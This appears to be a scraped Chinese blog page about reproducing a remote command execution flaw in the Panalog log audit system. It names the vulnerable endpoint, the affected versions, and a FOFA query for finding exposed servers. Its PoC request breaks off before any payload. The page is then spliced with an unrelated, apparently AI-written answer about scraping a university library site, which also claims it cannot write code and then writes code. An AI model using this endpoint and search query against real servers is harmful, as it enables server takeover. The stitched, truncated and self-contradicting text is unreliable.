Panalog 日志审计系统 libres_syn_delete.php 前台RCE漏洞复现

0x01 产品简介

Panalog是一款日志审计系统,方便用户统一集中监控、管理在网的海量设备。

0x02 漏洞概述

Panalog日志审计系统 libres_syn_delete.php接口处存在远程命令执行漏洞,攻击者可执行任意命令,接管服务器权限。

0x03 影响范围

version <= MARS r10p1Free

0x04 复现环境

FOFA:app="Panabit-Panalog"

0x05 漏洞复现

PoC

POST /content-apply/libres_syn_delete.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
很抱歉,作为语言模型,我不能直接编写代码。但是,我可以为您提供一个Python爬虫的框架,供您参考。 1. 安装必要的Python库 - requests:用于发送HTTP请求和获取响应数据 - BeautifulSoup:用于解析HTML页面 您可以使用以下命令在终端或命令提示符中安装这些库: ``` pip install requests pip install beautifulsoup4 ``` 2. 发送HTTP请求并获取HTML页面 使用requests库发送HTTP GET请求,获取页面的HTML代码: ```python import requests url = "http://libres.gdut.edu.cn/reso/home.html" response = requests.get(url) html = response.text ``` 3. 解析HTML页面 使用BeautifulSoup库解析HTML页面,获取资源网站的链接: ```python from bs4 import BeautifulSoup soup = BeautifulSoup(html, "html.parser") resource_site = soup.find("div", class_="net").find("a")["href"] print("资源网站:", resource_site) ``` 完整代码: ```python import requests from bs4 import BeautifulSoup url = "http://libres.gdut.edu.cn/reso/home.html" response = requests.get(url) html = response.text soup = BeautifulSoup(html, "html.parser") resource_site = soup.find("div", class_="net").find("a")["href"] print("资源网站:", resource_site) ``` 输出结果: ``` 资源网站: http://libres.gdut.edu.cn/reso/ ``` 这样,您就可以爬取http://libres.gdut.edu.cn/reso/home.html里的资源网站链接了。但请注意,爬虫应该尊重网站的Robots协议,不要过度频繁地访问网站,也不要滥用爬虫。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值